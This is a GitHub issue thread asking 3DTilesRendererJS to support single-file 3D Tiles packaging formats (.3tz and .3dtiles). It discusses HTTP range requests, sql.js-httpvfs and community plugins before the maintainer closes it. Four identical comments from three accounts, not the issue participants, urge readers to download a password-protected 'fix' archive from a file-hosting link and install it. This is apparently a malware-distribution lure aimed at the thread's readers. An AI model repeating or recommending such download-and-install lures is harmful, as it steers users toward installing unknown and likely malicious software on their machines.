### ISSUE TITLE
Support single-file packaging format spec `.3dtiles` or `.3tz`

### ISSUE THREAD

**Issue by jo-chemla** [NASA-AMMOS/3DTilesRendererJS#722]
**Is your feature request related to a problem? Please describe.**

There are multiple packaging formats for 3dtiles tilesets, which store the tiles + hierarchy content within a single dataset file. This makes it easier to copy/transfer tilesets (faster operations since there is a single large file rather than thousands of small files), usually reduces disk size (no minimum file allocation) etc. The two main existing formats are: 
 - `.3tz` which is equivalent to a ~zip of the tileset directory
 - and `.3dtiles` which is an ~sqlite db with key unix path and content blob

Link to the [Cesium proposal thread](https://github.com/CesiumGS/3d-tiles/issues/727) for a 3D Tiles packaging format specification. It seems that the .3dtiles is the one that cesium team is aiming for broader support. After a quick research, it does not seem that support for any of these packaging formats is yet implemented within an existing library 3dtiles (cesiumjs, UE plugin etc).

**Describe the solution you'd like**

It would be great if the 3DTilesRendererJS library would support one of these packaging formats at some point. 

**Describe alternatives you've considered**

Both formats can be converted from/to via [3d-tiles-tools convert](https://github.com/CesiumGS/3d-tiles-tools?tab=readme-ov-file#convert), so one can extract a standard tileset.json + hierarchy from a `.3tz` or `.3dtiles` file. Also, `.3tz` can be simply unzipped.

**Comment by MirsonMboa** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by ahmar7** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by ahmar7** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by NikhilKumar77777** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by jo-chemla** [comment]
Use case would indeed be rather to use HTTP2 range requests to fetch through this single-file tileset - often such datasets are a few tens or hundreds of GBs, so loading the whole blob in browser would not be useful. This would be akin to replicating the way COG (cloud optimized geotiffs)/COPC (cloud optimized pointclouds) are fetched on-the-fly given the user viewpoint within the dataset by browser libraries like 
 - [OpenLayers](https://openlayers.org/en/latest/examples/cog.html) or [geotiffjs/cog-explorer](https://github.com/geotiffjs/cog-explorer) for COG
 - Potree for COPC (or [potree v2](https://github.com/potree/potree/blob/c53cf7f7e692ee27bc4c2c623fe17bd678d25558/src/modules/loader/2.0/OctreeLoader.js#L256) format spec) (or not open-source copc-viewer from hobu team)
 - or the [v5.0 roadmap for loaders.gl](https://loaders.gl/docs/roadmap#v50) to support COPC/COG etc 


The closest already-live equivalent would be a potree scene loading a COPC or potree v2 dataset via range-requests, it runs really smoothly eg on french IGN datasets (requires an Allow-CORS plugin), [example here](https://3d.iconem.com/tools/load_potree_project_from_urlparam.html?fit=true=c=elevation&potreeDatasetUrl=https://storage.sbg.cloud.ovh.net/v1/AUTH_63234f509d6048bca3c9fd7928720ca1/ppk-lidar/KE/LHD_FXX_0648_6863_PTS_O_LAMB93_IGN69.copc.laz)


For the `.3dtiles` sqlite file, this might probably help to rely on [sql.js-httpvfs](https://github.com/phiresky/sql.js-httpvfs) (and accompanying [blog post](https://phiresky.github.io/blog/2021/hosting-sqlite-databases-on-github-pages/)) which wraps a sqlite db behind  workers performing range-request access on a virtual file-system. For `.3tz`, there might be existing js libs to access a specific file within the zip hierarchy.

**Comment by gkjohnson** [comment]
> Use case would indeed be rather to use **HTTP2 range requests** to fetch through this single-file tileset 

As far as I understand the Range header is supported in HTTP1, as well. If the use case is to just use range requests in the client and run the same number of requests then what's the benefit over just unpacking the tile set on the server and fetching using the typical means?

**Comment by jo-chemla** [comment]
Indeed, no runtime benefits, just simpler to handle tilesets as a self-contained dataset file, like any massive image/pointcloud file stored as a cloud-optimized format. The Cesium proposal thread I mention links to a draft 1.0.0 [3DTilesPackageSpecification](https://github.com/CesiumGS/3d-tiles/files/10338240/3DTilesPackageSpecification-1.0.0-2022-12-08.pdf). From my understanding, the [3tz specification](https://github.com/erikdahlstrom/3tz-specification/blob/master/3D%20Tiles%20Archive%20Format%20v1.3.pdf) is documented in this 3 years old repo, but from my understanding the cesium team is aiming for `.3dtiles` for long-term package support - I've asked them in the referenced [thread](https://github.com/CesiumGS/3d-tiles/issues/727).

**Comment by gkjohnson** [comment]
There's a PR in #1568 that adds in a plugin for 3tz, though I don't plan to merge it (explained in the issue). At this point I think it would be best for something like a 3tz or 3dtiles single-file format to be community-maintained plugins if anyone would like to take that up. In any case I'll close this for now.

**Comment by jo-chemla** [comment]
Thanks for getting back, understood that this would rather be a community-plugin - nice idea as well. 

Quick note, the `*.3tz` is specified by community - not cesium directly, but Maxar satellite is behind it - and `*.3dtiles` seems more of a more loosely specified format. Just asked the cesium team whether they have plan for direct cesiumjs/cesium-native integrations. They recently added support to `3d-tiles-tools serve` CLI, that acts as a middleware server between packages stored as archves, that can be consumed as standard ogc-3dtiles tilesets/directories. 

https://github.com/CesiumGS/3d-tiles-tools/pull/86#issuecomment-4497758580
